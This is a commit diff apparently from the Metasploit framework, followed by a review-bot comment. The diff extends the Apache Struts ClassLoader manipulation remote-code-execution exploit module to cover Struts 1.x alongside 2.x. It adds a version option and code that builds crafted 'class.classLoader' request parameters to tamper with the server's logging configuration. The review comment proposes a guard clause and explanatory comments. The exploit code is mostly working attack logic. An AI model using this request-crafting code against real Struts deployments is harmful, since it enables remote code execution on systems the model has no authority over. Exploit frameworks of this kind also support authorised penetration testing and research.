Land #4683, @julianvilas's support for struts 1 on struts_code_exec_classloader
commit
3471b43010
|
@ -16,11 +16,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Apache Struts ClassLoader Manipulation Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a remote command execution vulnerability in Apache Struts
|
||||
versions < 2.3.16.2. This vulnerability is due to the ParametersInterceptor, which allows
|
||||
access to 'class' parameter that is directly mapped to getClass() method and
|
||||
allows ClassLoader manipulation. As a result, this can allow remote attackers to execute arbitrary
|
||||
Java code via crafted parameters.
|
||||
This module exploits a remote command execution vulnerability in Apache Struts versions
|
||||
1.x (<= 1.3.10) and 2.x (< 2.3.16.2). In Struts 1.x the problem is related with
|
||||
the ActionForm bean population mechanism while in case of Struts 2.x the vulnerability is due
|
||||
to the ParametersInterceptor. Both allow access to 'class' parameter that is directly
|
||||
mapped to getClass() method and allows ClassLoader manipulation. As a result, this can
|
||||
allow remote attackers to execute arbitrary Java code via crafted parameters.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -33,8 +34,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['CVE', '2014-0094'],
|
||||
['CVE', '2014-0112'],
|
||||
['CVE', '2014-0114'],
|
||||
['URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'],
|
||||
['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html']
|
||||
['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'],
|
||||
['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204'],
|
||||
['URL', 'https://github.com/rgielen/struts1filter/tree/develop']
|
||||
],
|
||||
'Platform' => %w{ linux win },
|
||||
'Payload' =>
|
||||
|
@ -69,7 +73,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])
|
||||
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]),
|
||||
OptEnum.new('STRUTS_VERSION', [ true, 'Apache Struts Framework version', '2.x', ['1.x','2.x']])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -101,15 +106,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def modify_class_loader(opts)
|
||||
|
||||
cl_prefix =
|
||||
case datastore['STRUTS_VERSION']
|
||||
when '1.x' then "class.classLoader"
|
||||
when '2.x' then "class['classLoader']"
|
||||
end
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path.to_s),
|
||||
'version' => '1.1',
|
||||
'method' => 'GET',
|
||||
'vars_get' => {
|
||||
"class['classLoader'].resources.context.parent.pipeline.first.directory" => opts[:directory],
|
||||
"class['classLoader'].resources.context.parent.pipeline.first.prefix" => opts[:prefix],
|
||||
"class['classLoader'].resources.context.parent.pipeline.first.suffix" => opts[:suffix],
|
||||
"class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
|
||||
"#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory],
|
||||
"#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix],
|
||||
"#{cl_prefix}.resources.context.parent.pipeline.first.suffix" => opts[:suffix],
|
||||
"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
|
||||
}
|
||||
})
|
||||
|
||||
|
|
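Review bot: The `case datastore['STRUTS_VERSION']` that builds `cl_prefix` has no `else` branch, so any value other than '1.x' or '2.x' leaves `cl_prefix` nil and the interpolated `vars_get` keys silently degrade to `.resources.context.parent.pipeline.first.…`, which would send a malformed request rather than fail fast. OptEnum should prevent that today, but the prefix is the security-relevant part of the request and deserves an explicit guard: add `else fail_with(Failure::BadConfig, "Unsupported STRUTS_VERSION: #{datastore['STRUTS_VERSION']}")` before the `end` of the case. The keys are also built the same way four times; a short comment above the case, such as `# Struts 1.x reaches the ClassLoader through the ActionForm bean path, 2.x through OGNL's class['classLoader']`, would make the two spellings understandable to the next maintainer. The body of `modify_class_loader` continues past the end of this hunk, so the response handling is not reviewed here.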